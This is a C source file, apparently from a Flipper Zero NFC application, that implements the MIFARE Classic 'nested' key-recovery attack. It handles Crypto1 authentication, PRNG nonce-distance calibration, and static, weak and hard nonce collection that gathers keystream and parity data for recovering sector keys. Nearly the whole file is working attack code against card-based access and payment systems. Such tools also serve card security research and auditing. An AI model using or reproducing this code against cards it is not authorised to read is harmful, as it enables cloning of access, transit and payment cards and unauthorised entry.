nested.c 19 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394395396397398399400401402403404405406407408409410411412413414415416417418419420421422423424425426427428429430431432433434435436437438439440441442443444445446447448449450451452453454455456457458459460461462463464465466467468469470471472473474475476477478479480481482483484485486487488489490491492493494495496497498499500501502503504505506507508509510511512513514515516517518519520521522523524525526527528529530531532533534535536537538539540541542543544545546547548549550551552553554555556557558559560561562563564565566567568569570571572573574575576577578579580581582583584585586587588589590591592593594595596597598599600601602603604605606607608609610611612613614615616617618619620621622623624625626627628629630631632633634635636637638639640641642643644645646647648649650651652653654655656657658659660661662663664665666667668669670671672673674675676677678679680681682683684685686687688689690691692693694695696697698699700701702703704705706707708709710711712713714715716717
  1. #include "nested.h"
  2. #include "../nfclegacy/furi_hal_nfc.h"
  3. #include "../../lib/crypto1/crypto1.h"
  4. #define TAG "Nested"
  5. uint16_t nsnfca_get_crc16(uint8_t* buff, uint16_t len) {
  6. uint16_t crc = 0x6363; // NFCA_CRC_INIT
  7. uint8_t byte = 0;
  8. for(uint8_t i = 0; i < len; i++) {
  9. byte = buff[i];
  10. byte ^= (uint8_t)(crc & 0xff);
  11. byte ^= byte << 4;
  12. crc = (crc >> 8) ^ (((uint16_t)byte) << 8) ^ (((uint16_t)byte) << 3) ^
  13. (((uint16_t)byte) >> 4);
  14. }
  15. return crc;
  16. }
  17. void nsnfca_append_crc16(uint8_t* buff, uint16_t len) {
  18. uint16_t crc = nsnfca_get_crc16(buff, len);
  19. buff[len] = (uint8_t)crc;
  20. buff[len + 1] = (uint8_t)(crc >> 8);
  21. }
  22. bool mifare_sendcmd_short(
  23. Crypto1* crypto,
  24. FurryHalNfcTxRxContext* tx_rx,
  25. bool crypted,
  26. uint32_t cmd,
  27. uint32_t data) {
  28. uint16_t pos;
  29. uint8_t dcmd[4] = {cmd, data, 0x00, 0x00};
  30. nsnfca_append_crc16(dcmd, 2);
  31. memset(tx_rx->tx_data, 0, sizeof(tx_rx->tx_data));
  32. memset(tx_rx->tx_parity, 0, sizeof(tx_rx->tx_parity));
  33. if(crypted) {
  34. for(pos = 0; pos < 4; pos++) {
  35. uint8_t res = nescrypto1_byte(crypto, 0x00, 0) ^ dcmd[pos];
  36. tx_rx->tx_data[pos] = res;
  37. tx_rx->tx_parity[0] |=
  38. (((nescrypto1_filter(crypto->odd) ^ oddparity8(dcmd[pos])) & 0x01) << (7 - pos));
  39. }
  40. tx_rx->tx_rx_type = FurryHalNfcTxRxTypeRaw;
  41. tx_rx->tx_bits = 4 * 8;
  42. } else {
  43. for(pos = 0; pos < 2; pos++) {
  44. tx_rx->tx_data[pos] = dcmd[pos];
  45. }
  46. tx_rx->tx_rx_type = FurryHalNfcTxRxTypeRxNoCrc;
  47. tx_rx->tx_bits = 2 * 8;
  48. }
  49. if(!furry_hal_nfc_tx_rx(tx_rx, 6)) return false;
  50. return true;
  51. }
  52. bool mifare_classic_authex(
  53. Crypto1* crypto,
  54. FurryHalNfcTxRxContext* tx_rx,
  55. uint32_t uid,
  56. uint32_t blockNo,
  57. uint32_t keyType,
  58. uint64_t ui64Key,
  59. bool isNested,
  60. uint32_t* ntptr) {
  61. uint32_t nt, ntpp; // Supplied tag nonce
  62. uint8_t nr[4];
  63. // "random" reader nonce:
  64. nfc_util_num2bytes(nesprng_successor(0, 32), 4, nr); // DWT->CYCCNT
  65. // Transmit MIFARE_CLASSIC_AUTH
  66. if(!mifare_sendcmd_short(crypto, tx_rx, isNested, 0x60 + (keyType & 0x01), blockNo)) {
  67. return false;
  68. };
  69. memset(tx_rx->tx_data, 0, sizeof(tx_rx->tx_data));
  70. memset(tx_rx->tx_parity, 0, sizeof(tx_rx->tx_parity));
  71. nt = (uint32_t)nfc_util_bytes2num(tx_rx->rx_data, 4);
  72. if(isNested) nescrypto1_reset(crypto); // deinit
  73. nescrypto1_init(crypto, ui64Key);
  74. if(isNested) {
  75. nt = nescrypto1_word(crypto, nt ^ uid, 1) ^ nt;
  76. } else {
  77. nescrypto1_word(crypto, nt ^ uid, 0);
  78. }
  79. // save Nt
  80. if(ntptr) *ntptr = nt;
  81. // Generate (encrypted) nr+parity by loading it into the cipher (Nr)
  82. tx_rx->tx_parity[0] = 0;
  83. for(uint8_t i = 0; i < 4; i++) {
  84. tx_rx->tx_data[i] = nescrypto1_byte(crypto, nr[i], 0) ^ nr[i];
  85. tx_rx->tx_parity[0] |=
  86. (((nescrypto1_filter(crypto->odd) ^ oddparity8(nr[i])) & 0x01) << (7 - i));
  87. }
  88. nt = nesprng_successor(nt, 32);
  89. for(uint8_t i = 4; i < 8; i++) {
  90. nt = nesprng_successor(nt, 8);
  91. tx_rx->tx_data[i] = nescrypto1_byte(crypto, 0x00, 0) ^ (nt & 0xff);
  92. tx_rx->tx_parity[0] |=
  93. (((nescrypto1_filter(crypto->odd) ^ oddparity8(nt & 0xff)) & 0x01) << (7 - i));
  94. }
  95. tx_rx->tx_rx_type = FurryHalNfcTxRxTypeRaw;
  96. tx_rx->tx_bits = 8 * 8;
  97. if(!furry_hal_nfc_tx_rx(tx_rx, 25)) {
  98. return false;
  99. };
  100. uint32_t answer = (uint32_t)nfc_util_bytes2num(tx_rx->rx_data, 4);
  101. ntpp = nesprng_successor(nt, 32) ^ nescrypto1_word(crypto, 0, 0);
  102. if(answer != ntpp) {
  103. return false;
  104. }
  105. return true;
  106. }
  107. static int valid_nonce(uint32_t Nt, uint32_t NtEnc, uint32_t Ks1, const uint8_t* parity) {
  108. return ((oddparity8((Nt >> 24) & 0xFF) ==
  109. ((parity[0]) ^ oddparity8((NtEnc >> 24) & 0xFF) ^ FURI_BIT(Ks1, 16))) &&
  110. (oddparity8((Nt >> 16) & 0xFF) ==
  111. ((parity[1]) ^ oddparity8((NtEnc >> 16) & 0xFF) ^ FURI_BIT(Ks1, 8))) &&
  112. (oddparity8((Nt >> 8) & 0xFF) ==
  113. ((parity[2]) ^ oddparity8((NtEnc >> 8) & 0xFF) ^ FURI_BIT(Ks1, 0)))) ?
  114. 1 :
  115. 0;
  116. }
  117. void nonce_distance(uint32_t* msb, uint32_t* lsb) {
  118. uint16_t x = 1, pos;
  119. uint8_t calc_ok = 0;
  120. for(uint16_t i = 1; i; ++i) {
  121. pos = (x & 0xff) << 8 | x >> 8;
  122. if((pos == *msb) & !(calc_ok >> 0 & 0x01)) {
  123. *msb = i;
  124. calc_ok |= 0x01;
  125. }
  126. if((pos == *lsb) & !(calc_ok >> 1 & 0x01)) {
  127. *lsb = i;
  128. calc_ok |= 0x02;
  129. }
  130. if(calc_ok == 0x03) {
  131. return;
  132. }
  133. x = x >> 1 | (x ^ x >> 2 ^ x >> 3 ^ x >> 5) << 15;
  134. }
  135. }
  136. bool validate_prng_nonce(uint32_t nonce) {
  137. uint32_t msb = nonce >> 16;
  138. uint32_t lsb = nonce & 0xffff;
  139. nonce_distance(&msb, &lsb);
  140. return ((65535 - msb + lsb) % 65535) == 16;
  141. }
  142. MifareNestedNonceType nested_check_nonce_type(FurryHalNfcTxRxContext* tx_rx, uint8_t blockNo) {
  143. uint32_t nonces[5] = {};
  144. uint8_t sameNonces = 0;
  145. uint8_t hardNonces = 0;
  146. Crypto1 crypt;
  147. Crypto1* crypto = {&crypt};
  148. for(int32_t i = 0; i < 5; i++) {
  149. // Setup nfc poller
  150. nfc_activate();
  151. furry_hal_nfc_activate_nfca(100, NULL);
  152. // Start communication
  153. bool success = mifare_sendcmd_short(crypto, tx_rx, false, 0x60, blockNo);
  154. if(!success) {
  155. continue;
  156. };
  157. uint32_t nt = (uint32_t)nfc_util_bytes2num(tx_rx->rx_data, 4);
  158. if(nt == 0) continue;
  159. if(!validate_prng_nonce(nt)) hardNonces++;
  160. nonces[i] = nt;
  161. nfc_deactivate();
  162. }
  163. for(int32_t i = 0; i < 5; i++) {
  164. for(int32_t j = 0; j < 5; j++) {
  165. if(i != j && nonces[j] && nonces[i] == nonces[j]) {
  166. sameNonces++;
  167. }
  168. }
  169. }
  170. if(!nonces[4]) {
  171. return MifareNestedNonceNoTag;
  172. }
  173. if(sameNonces > 3) {
  174. return MifareNestedNonceStatic;
  175. }
  176. if(hardNonces > 3) {
  177. return MifareNestedNonceHard;
  178. }
  179. return MifareNestedNonceWeak;
  180. }
  181. struct nonce_info_static nested_static_nonce_attack(
  182. FurryHalNfcTxRxContext* tx_rx,
  183. uint8_t blockNo,
  184. uint8_t keyType,
  185. uint8_t targetBlockNo,
  186. uint8_t targetKeyType,
  187. uint64_t ui64Key) {
  188. uint32_t cuid = 0;
  189. Crypto1* crypto = malloc(sizeof(Crypto1));
  190. struct nonce_info_static r;
  191. r.full = false;
  192. // Setup nfc poller
  193. nfc_activate();
  194. if(!furry_hal_nfc_activate_nfca(200, &cuid)) {
  195. free(crypto);
  196. return r;
  197. }
  198. r.cuid = cuid;
  199. uint32_t nt1;
  200. uint32_t nt_unused;
  201. nescrypto1_reset(crypto);
  202. mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, false, &nt1);
  203. if(targetKeyType == 1 && nt1 == 0x009080A2) {
  204. r.target_nt[0] = nesprng_successor(nt1, 161);
  205. r.target_nt[1] = nesprng_successor(nt1, 321);
  206. } else {
  207. r.target_nt[0] = nesprng_successor(nt1, 160);
  208. r.target_nt[1] = nesprng_successor(nt1, 320);
  209. }
  210. bool success =
  211. mifare_sendcmd_short(crypto, tx_rx, true, 0x60 + (targetKeyType & 0x01), targetBlockNo);
  212. if(!success) {
  213. free(crypto);
  214. return r;
  215. };
  216. uint32_t nt2 = nfc_util_bytes2num(tx_rx->rx_data, 4);
  217. r.target_ks[0] = nt2 ^ r.target_nt[0];
  218. nfc_activate();
  219. if(!furry_hal_nfc_activate_nfca(200, &cuid)) {
  220. free(crypto);
  221. return r;
  222. }
  223. nescrypto1_reset(crypto);
  224. mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, false, &nt1);
  225. mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, true, &nt_unused);
  226. success =
  227. mifare_sendcmd_short(crypto, tx_rx, true, 0x60 + (targetKeyType & 0x01), targetBlockNo);
  228. free(crypto);
  229. if(!success) {
  230. return r;
  231. };
  232. uint32_t nt3 = (uint32_t)nfc_util_bytes2num(tx_rx->rx_data, 4);
  233. r.target_ks[1] = nt3 ^ r.target_nt[1];
  234. r.full = true;
  235. nfc_deactivate();
  236. return r;
  237. }
  238. uint32_t nested_calibrate_distance(
  239. FurryHalNfcTxRxContext* tx_rx,
  240. uint8_t blockNo,
  241. uint8_t keyType,
  242. uint64_t ui64Key,
  243. uint32_t delay,
  244. bool full) {
  245. uint32_t cuid = 0;
  246. Crypto1* crypto = malloc(sizeof(Crypto1));
  247. uint32_t nt1, nt2, i = 0, davg = 0, dmin = 0, dmax = 0, rtr = 0, unsuccessful_tries = 0;
  248. uint32_t max_prng_value = full ? 65565 : 1200;
  249. uint32_t rounds = full ? 5 : 17; // full does not require precision
  250. uint32_t collected = 0;
  251. for(rtr = 0; rtr < rounds; rtr++) {
  252. nfc_activate();
  253. if(!furry_hal_nfc_activate_nfca(200, &cuid)) break;
  254. if(!mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, false, &nt1)) {
  255. continue;
  256. }
  257. furi_delay_us(delay);
  258. if(!mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, true, &nt2)) {
  259. continue;
  260. }
  261. // NXP Mifare is typical around 840, but for some unlicensed/compatible mifare tag this can be 160
  262. uint32_t nttmp = nesprng_successor(nt1, 100);
  263. for(i = 101; i < max_prng_value; i++) {
  264. nttmp = nesprng_successor(nttmp, 1);
  265. if(nttmp == nt2) break;
  266. }
  267. if(i != max_prng_value) {
  268. if(rtr != 0) {
  269. davg += i;
  270. dmin = MIN(dmin, i);
  271. dmax = MAX(dmax, i);
  272. } else {
  273. dmin = dmax = i;
  274. }
  275. FURI_LOG_D(TAG, "Calibrating: ntdist=%lu", i);
  276. collected++;
  277. } else {
  278. unsuccessful_tries++;
  279. if(unsuccessful_tries > 12) {
  280. free(crypto);
  281. FURI_LOG_E(
  282. TAG,
  283. "Tag isn't vulnerable to nested attack (random numbers are not predictable)");
  284. return 0;
  285. }
  286. }
  287. }
  288. if(collected > 1) davg = (davg + (collected - 1) / 2) / (collected - 1);
  289. davg = MIN(MAX(dmin, davg), dmax);
  290. FURI_LOG_I(
  291. TAG,
  292. "Calibration completed: rtr=%lu min=%lu max=%lu avg=%lu collected=%lu",
  293. rtr,
  294. dmin,
  295. dmax,
  296. davg,
  297. collected);
  298. free(crypto);
  299. nfc_deactivate();
  300. return davg;
  301. }
  302. struct distance_info nested_calibrate_distance_info(
  303. FurryHalNfcTxRxContext* tx_rx,
  304. uint8_t blockNo,
  305. uint8_t keyType,
  306. uint64_t ui64Key) {
  307. uint32_t cuid = 0;
  308. Crypto1* crypto = malloc(sizeof(Crypto1));
  309. uint32_t nt1, nt2, i = 0, davg = 0, dmin = 0, dmax = 0, rtr = 0, unsuccessful_tries = 0;
  310. struct distance_info r;
  311. r.min_prng = 0;
  312. r.max_prng = 0;
  313. r.mid_prng = 0;
  314. for(rtr = 0; rtr < 10; rtr++) {
  315. nfc_activate();
  316. if(!furry_hal_nfc_activate_nfca(200, &cuid)) break;
  317. mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, false, &nt1);
  318. mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, true, &nt2);
  319. // NXP Mifare is typical around 840, but for some unlicensed/compatible mifare tag this can be 160
  320. uint32_t nttmp = nesprng_successor(nt1, 1);
  321. for(i = 2; i < 65565; i++) {
  322. nttmp = nesprng_successor(nttmp, 1);
  323. if(nttmp == nt2) break;
  324. }
  325. if(i != 65565) {
  326. if(rtr != 0) {
  327. davg += i;
  328. if(dmin == 0) {
  329. dmin = i;
  330. } else {
  331. dmin = MIN(dmin, i);
  332. }
  333. dmax = MAX(dmax, i);
  334. }
  335. FURI_LOG_D(TAG, "Calibrating: ntdist=%lu", i);
  336. } else {
  337. unsuccessful_tries++;
  338. if(unsuccessful_tries > 12) {
  339. free(crypto);
  340. FURI_LOG_E(
  341. TAG,
  342. "Tag isn't vulnerable to nested attack (random numbers are not predictable)");
  343. return r;
  344. }
  345. }
  346. }
  347. if(rtr > 1) davg = (davg + (rtr - 1) / 2) / (rtr - 1);
  348. FURI_LOG_I(
  349. TAG, "Calibration completed: rtr=%lu min=%lu max=%lu avg=%lu", rtr, dmin, dmax, davg);
  350. r.min_prng = dmin;
  351. r.max_prng = dmax;
  352. r.mid_prng = davg;
  353. free(crypto);
  354. nfc_deactivate();
  355. return r;
  356. }
  357. struct nonce_info nested_attack(
  358. FurryHalNfcTxRxContext* tx_rx,
  359. uint8_t blockNo,
  360. uint8_t keyType,
  361. uint8_t targetBlockNo,
  362. uint8_t targetKeyType,
  363. uint64_t ui64Key,
  364. uint32_t distance,
  365. uint32_t delay) {
  366. uint32_t cuid = 0;
  367. Crypto1* crypto = malloc(sizeof(Crypto1));
  368. uint8_t par_array[4] = {0x00};
  369. uint32_t nt1, nt2, ks1, i = 0, j = 0;
  370. struct nonce_info r;
  371. uint32_t dmin = distance - 2;
  372. uint32_t dmax = distance + 2;
  373. r.full = false;
  374. for(i = 0; i < 2; i++) { // look for exactly two different nonces
  375. r.target_nt[i] = 0;
  376. while(r.target_nt[i] == 0) { // continue until we have an unambiguous nonce
  377. nfc_activate();
  378. if(!furry_hal_nfc_activate_nfca(200, &cuid)) {
  379. free(crypto);
  380. return r;
  381. }
  382. r.cuid = cuid;
  383. mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, false, &nt1);
  384. furi_delay_us(delay);
  385. bool success = mifare_sendcmd_short(
  386. crypto, tx_rx, true, 0x60 + (targetKeyType & 0x01), targetBlockNo);
  387. if(!success) continue;
  388. nt2 = nfc_util_bytes2num(tx_rx->rx_data, 4);
  389. // Parity validity check
  390. for(j = 0; j < 4; j++) {
  391. par_array[j] =
  392. (oddparity8(tx_rx->rx_data[j]) != ((tx_rx->rx_parity[0] >> (7 - j)) & 0x01));
  393. }
  394. uint32_t ncount = 0;
  395. uint32_t nttest = nesprng_successor(nt1, dmin - 1);
  396. for(j = dmin; j < dmax + 1; j++) {
  397. nttest = nesprng_successor(nttest, 1);
  398. ks1 = nt2 ^ nttest;
  399. if(valid_nonce(nttest, nt2, ks1, par_array)) {
  400. if(ncount > 0) { // we are only interested in disambiguous nonces, try again
  401. FURI_LOG_D(TAG, "Nonce#%lu: dismissed (ambiguous), ntdist=%lu", i + 1, j);
  402. r.target_nt[i] = 0;
  403. break;
  404. }
  405. if(delay) {
  406. // will predict later
  407. r.target_nt[i] = nt1;
  408. r.target_ks[i] = nt2;
  409. } else {
  410. r.target_nt[i] = nttest;
  411. r.target_ks[i] = ks1;
  412. }
  413. memcpy(&r.parity[i], par_array, 4);
  414. ncount++;
  415. if(i == 1 &&
  416. (r.target_nt[0] == r.target_nt[1] ||
  417. r.target_ks[0] == r.target_ks[1])) { // we need two different nonces
  418. r.target_nt[i] = 0;
  419. FURI_LOG_D(TAG, "Nonce#2: dismissed (= nonce#1), ntdist=%lu", j);
  420. break;
  421. }
  422. FURI_LOG_D(TAG, "Nonce#%lu: valid, ntdist=%lu", i + 1, j);
  423. }
  424. }
  425. if(r.target_nt[i] == 0 && j == dmax + 1) {
  426. FURI_LOG_D(TAG, "Nonce#%lu: dismissed (all invalid)", i + 1);
  427. }
  428. }
  429. }
  430. if(r.target_nt[0] && r.target_nt[1]) {
  431. r.full = true;
  432. }
  433. free(crypto);
  434. nfc_deactivate();
  435. return r;
  436. }
  437. struct nonce_info_hard nested_hard_nonce_attack(
  438. FurryHalNfcTxRxContext* tx_rx,
  439. uint8_t blockNo,
  440. uint8_t keyType,
  441. uint8_t targetBlockNo,
  442. uint8_t targetKeyType,
  443. uint64_t ui64Key,
  444. uint32_t* found,
  445. uint32_t* first_byte_sum,
  446. Stream* file_stream) {
  447. uint32_t cuid = 0;
  448. uint8_t same = 0;
  449. uint64_t previous = 0;
  450. Crypto1* crypto = malloc(sizeof(Crypto1));
  451. uint8_t par_array[4] = {0x00};
  452. struct nonce_info_hard r;
  453. r.full = false;
  454. r.static_encrypted = false;
  455. for(uint32_t i = 0; i < 8; i++) {
  456. nfc_activate();
  457. if(!furry_hal_nfc_activate_nfca(200, &cuid)) {
  458. free(crypto);
  459. return r;
  460. }
  461. r.cuid = cuid;
  462. if(!mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, false, NULL))
  463. continue;
  464. if(!mifare_sendcmd_short(crypto, tx_rx, true, 0x60 + (targetKeyType & 0x01), targetBlockNo))
  465. continue;
  466. uint64_t nt = nfc_util_bytes2num(tx_rx->rx_data, 4);
  467. for(uint32_t j = 0; j < 4; j++) {
  468. par_array[j] =
  469. (oddparity8(tx_rx->rx_data[j]) != ((tx_rx->rx_parity[0] >> (7 - j)) & 0x01));
  470. }
  471. uint8_t pbits = 0;
  472. for(uint8_t j = 0; j < 4; j++) {
  473. uint8_t p = oddparity8(tx_rx->rx_data[j]);
  474. if(par_array[j]) {
  475. p ^= 1;
  476. }
  477. pbits <<= 1;
  478. pbits |= p;
  479. }
  480. // update unique nonces
  481. if(!found[tx_rx->rx_data[0]]) {
  482. *first_byte_sum += evenparity32(pbits & 0x08);
  483. found[tx_rx->rx_data[0]]++;
  484. }
  485. if(nt == previous) {
  486. same++;
  487. }
  488. previous = nt;
  489. FuriString* row = furi_string_alloc_printf("%llu|%u\n", nt, pbits);
  490. stream_write_string(file_stream, row);
  491. FURI_LOG_D(TAG, "Accured %lu/8 nonces", i + 1);
  492. furi_string_free(row);
  493. }
  494. if(same > 4) {
  495. r.static_encrypted = true;
  496. }
  497. r.full = true;
  498. free(crypto);
  499. nfc_deactivate();
  500. return r;
  501. }
  502. NestedCheckKeyResult nested_check_key(
  503. FurryHalNfcTxRxContext* tx_rx,
  504. uint8_t blockNo,
  505. uint8_t keyType,
  506. uint64_t ui64Key) {
  507. uint32_t cuid = 0;
  508. uint32_t nt;
  509. nfc_activate();
  510. if(!furry_hal_nfc_activate_nfca(200, &cuid)) return NestedCheckKeyNoTag;
  511. FURI_LOG_D(
  512. TAG, "Checking %c key %012llX for block %u", !keyType ? 'A' : 'B', ui64Key, blockNo);
  513. Crypto1* crypto = malloc(sizeof(Crypto1));
  514. bool success =
  515. mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, false, &nt);
  516. free(crypto);
  517. nfc_deactivate();
  518. return success ? NestedCheckKeyValid : NestedCheckKeyInvalid;
  519. }
  520. bool nested_check_block(FurryHalNfcTxRxContext* tx_rx, uint8_t blockNo, uint8_t keyType) {
  521. uint32_t cuid = 0;
  522. nfc_activate();
  523. if(!furry_hal_nfc_activate_nfca(200, &cuid)) return false;
  524. Crypto1* crypto = malloc(sizeof(Crypto1));
  525. bool success = mifare_sendcmd_short(crypto, tx_rx, false, 0x60 + (keyType & 0x01), blockNo);
  526. free(crypto);
  527. nfc_deactivate();
  528. return success;
  529. }
  530. void nested_get_data(FurryHalNfcDevData* dev_data) {
  531. nfc_activate();
  532. furry_hal_nfc_detect(dev_data, 400);
  533. nfc_deactivate();
  534. }
  535. void nfc_activate() {
  536. nfc_deactivate();
  537. // Setup nfc poller
  538. furry_hal_nfc_exit_sleep();
  539. furry_hal_nfc_ll_txrx_on();
  540. furry_hal_nfc_ll_poll();
  541. if(furry_hal_nfc_ll_set_mode(
  542. FurryHalNfcModePollNfca, FurryHalNfcBitrate106, FurryHalNfcBitrate106) !=
  543. FurryHalNfcReturnOk)
  544. return;
  545. furry_hal_nfc_ll_set_fdt_listen(FURRY_HAL_NFC_LL_FDT_LISTEN_NFCA_POLLER);
  546. furry_hal_nfc_ll_set_fdt_poll(FURRY_HAL_NFC_LL_FDT_POLL_NFCA_POLLER);
  547. furry_hal_nfc_ll_set_error_handling(FurryHalNfcErrorHandlingNfc);
  548. furry_hal_nfc_ll_set_guard_time(FURRY_HAL_NFC_LL_GT_NFCA);
  549. }
  550. void nfc_deactivate() {
  551. furry_hal_nfc_ll_txrx_off();
  552. furry_hal_nfc_start_sleep();
  553. furry_hal_nfc_sleep();
  554. }